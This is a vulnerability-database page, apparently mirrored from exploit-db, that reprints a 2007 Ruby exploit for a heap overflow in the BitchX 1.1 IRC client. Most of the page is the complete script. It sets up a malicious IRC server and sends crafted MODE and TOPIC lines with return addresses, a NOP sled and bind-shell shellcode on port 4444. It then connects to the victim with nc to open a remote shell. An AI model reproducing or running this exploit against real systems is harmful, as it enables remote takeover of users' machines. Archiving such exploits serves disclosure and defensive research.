Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BitchX 1.1 Final - MODE Remote Heap Overflow

🗓️ 27 Aug 2007 00:00:00Reported by banneditType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

BitchX-1.1 Final Mode Heap Buffer Overflow, Discovered May 16th 2007, Potential exploit to overwrite GOT with shellcode address using p_mode stack overflow

Code
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################

require 'socket'

#the linux 2.6 target most effective atm
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }

shellcode = #fork before binding a shell provides a clean exit
            "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"+

             #metasploit linux x86 shellcode bind tcp port 4444
            "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfc"+
            "\x98\xd8\xb8\x83\xeb\xfc\xe2\xf4\xcd\x43\x8b\xfb\xaf\xf2\xda\xd2"+
            "\x9a\xc0\x41\x31\x1d\x55\x58\x2e\xbf\xca\xbe\xd0\xed\xc4\xbe\xeb"+
            "\x75\x79\xb2\xde\xa4\xc8\x89\xee\x75\x79\x15\x38\x4c\xfe\x09\x5b"+
            "\x31\x18\x8a\xea\xaa\xdb\x51\x59\x4c\xfe\x15\x38\x6f\xf2\xda\xe1"+
            "\x4c\xa7\x15\x38\xb5\xe1\x21\x08\xf7\xca\xb0\x97\xd3\xeb\xb0\xd0"+
            "\xd3\xfa\xb1\xd6\x75\x7b\x8a\xeb\x75\x79\x15\x38"
           

port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)

ret = (targets['linux 2.6 Hardened (FC6)'].hex)

puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit                                -"
puts "----------------------------------------------"


puts "\n[-] listening for incoming clients..."

while (client = sock.accept)
   ip = client.peeraddr

   buffer = client.gets
   puts "[<] #{buffer}"
  
   hostname = ([ret].pack('V')) * 13
   nick = "bannedit"

   #Fake server reply to connection
   buffer = ":#{nick} MODE #{nick} :+iw\r\n"+
            ":0 001 #{nick} :biznitch-1.0\r\n"+
            ":5 002 #{nick} :biznitch-1.0\r\n"+
            ":6 003 #{nick} :a\r\n"+
            ":aaa 004 #{nick} :a\r\n"+
            ":aaa 005 #{nick} :a\r\n"+
            ":aaa 251 #{nick} :a\r\n"+
            ":aaa 252 #{nick} :a\r\n"+
            ":aaa 253 #{nick} :a\r\n"+
            ":aaa 254 #{nick} :a\r\n"+
            ":aaa 255 #{nick} :a\r\n"+
            ":aaa 375 #{nick} :a\r\n"+
            ":aaa 372 #{nick} :a\r\n"+
            ":aaa 376 #{nick} :a\r\n"
           
   join =   ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}\r\n"+      
            ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers\r\n"

   puts "[>] sending fake server response"
   client.send(buffer, 0)
   sleep(2)
#   client.send(join, 0)

   topic =  ":aaa TOPIC #hackers:"
   ret = ret + 0x200
   topic<<  ([ret].pack('V')) * 100
   topic<< "\r\n"
   for i in 0..20
   client.send(topic, 0)
   end

   puts "[>] sending evil buffer"
   evilbuf = ":#{hostname}  MODE "
   evilbuf<< "#{nick} :aaa"
   ret = ret + 0x200
   evilbuf<< ([ret].pack('V')) * 200
   evilbuf<< "\x90" * (1126 - shellcode.length)
   evilbuf<< shellcode
   evilbuf<< "\x90" * 40
   evilbuf<< "\r\n"
  
   for i in 0..5
      client.send(evilbuf, 0)
   end

sleep(10) #wait for the shellcode to do its thing...

puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...\n\n"

   fork {
           system("nc #{ip[3]} 4444")
           puts "[+] exiting shell dropping back to listener"
        }
end

# milw0rm.com [2007-08-27]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
bitchx-1.1heap overflowshellcodelinux 2.6exploitp_modestack overflowshellcode addressgotdiscovered may 16th 2007
23